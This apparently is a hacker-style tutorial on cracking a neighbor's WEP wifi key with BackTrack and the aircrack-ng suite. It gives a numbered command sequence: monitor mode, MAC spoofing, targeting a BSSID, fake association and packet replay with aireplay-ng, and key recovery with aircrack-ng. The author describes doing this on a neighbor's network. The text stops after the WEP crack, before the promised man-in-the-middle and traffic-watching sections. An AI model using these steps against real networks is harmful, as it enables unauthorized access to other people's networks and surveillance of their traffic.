The sole purpose of this article is so that you may be informed about how your neighbor may be able to take a laptop, crack your wep/wpa key to your router you think is safe, then reroute all your internet traffic to his computer you think he can't look at, and even watch you browse the internet in real time when you think nobody is watching.
-disclaimer-In this article, I don't plan on giving you any bullshit. I don't plan on hinting towards how to break into a wifi network, I will show you how to break into a wifi network. I will do it simple steps, and only break them down if I feel that you will need it or can benefit from knowing it. The following subjects I will touch on include the following: 1. Brief Introduction to Backtrack 2.Cracking the WEP Key (we will go over WEP cracking, I may write another one on WPA a bit later...) 3. MITM Attack 4. Basic Network Analysis
-What I will be Going Over-
Backtrack is something that is essential, in my opinion, to be in any hackers toolbox. It is a live-linux cd that is compatible with most laptops (Just for reference sake, I am using my Eee PC with an external DVDRom drive to bootit). All you have to do is go to www.remoteexploit.org and download the ISO that fits what you would like to use it on (CD, DVD, or USB/SD). Once you do that, you will need to to stick the CD/DVD/USB/SD into your laptop, and restart. When you restart, you must hit whatever key you need to do load the boot options, for most computers it's F8 or F9, for mine, it's the ESC key. Once you boot into it,you will have to go through a few menus, basically all you have to do is keep hitting enter until the KDE loads. When the boot is finished, you should see a screen similar to this:
-Brief Introduction to Backtrack-
-Cracking the WEP KeyNote: For reference, since not all parameters are the same for each laptop, I have put them as variables ($) where you plug in what is necessary for you.1. Open a new shell prompt:
1. Type airmon-ng to see what interfaces are available. As you can see I have 2 interfaces, wifi0 and ath0, but wifi0 is the parent of ath0, so this will be a bit tricky. Most laptops only have one interface. 2. Type airmon-ng stop ath0 to stop the ath0 interface 3. Type airmon-ng start wifi0 so it puts ath0 into monitor mode
4. Type clear to clear the screenthen type ifconfig ath0 down 5. Now we need to change the MAC address, to do this type macchanger –mac 00:11:22:33:44:55 ath0
6. Now we need to turn our interfaces back on by typing airmon-ng start wifi0
7. Now we get down to the meat and bones, we can start scanning for networks by typing in airodump-ng ath0
8. If you already know the ESSID of the network you would like to crack the WEPkey for, go right ahead and crack it, but because I am doing this on a neighbor, I took a guess that it was the one with the highest PWR. Which is linksys---- (blocked out for security purposes)
9. Now we are going to single that network out by typing in the following: airodump-ng -c $CHANNEL -w wepcrack –bssid $BSSID ath0
11.Now our goal is to get the #Data field to reach around 10,000 (justto be safe) so we have to provoke the data by first associating ourselves with the network. Do this by typing aireplay-ng -1 0 -a $BSSID -h 00:11:22:33:44:55 -e $ESSID ath0 i don't think I would need to break this down for you, to do this, I am sure you can just look at what I did for each of the variables and plug in your own.
12.Now that were associated, we can start sending packets back tothe network, therfore increasing the amount in the #Data field. We do this by typing in aireplay-ng -3 -b $BSSID -h 00:11:22:33:44:55 ath0 13.Once you think the #Data has climbbed to a decent amount, open a new shell prompt and type the following: aircrack-ng -n 64 -b $BSSID wepcrack-01.cap
Congratulations! We just cracked our first WEP key. Now what I am going to do is restart my laptop and...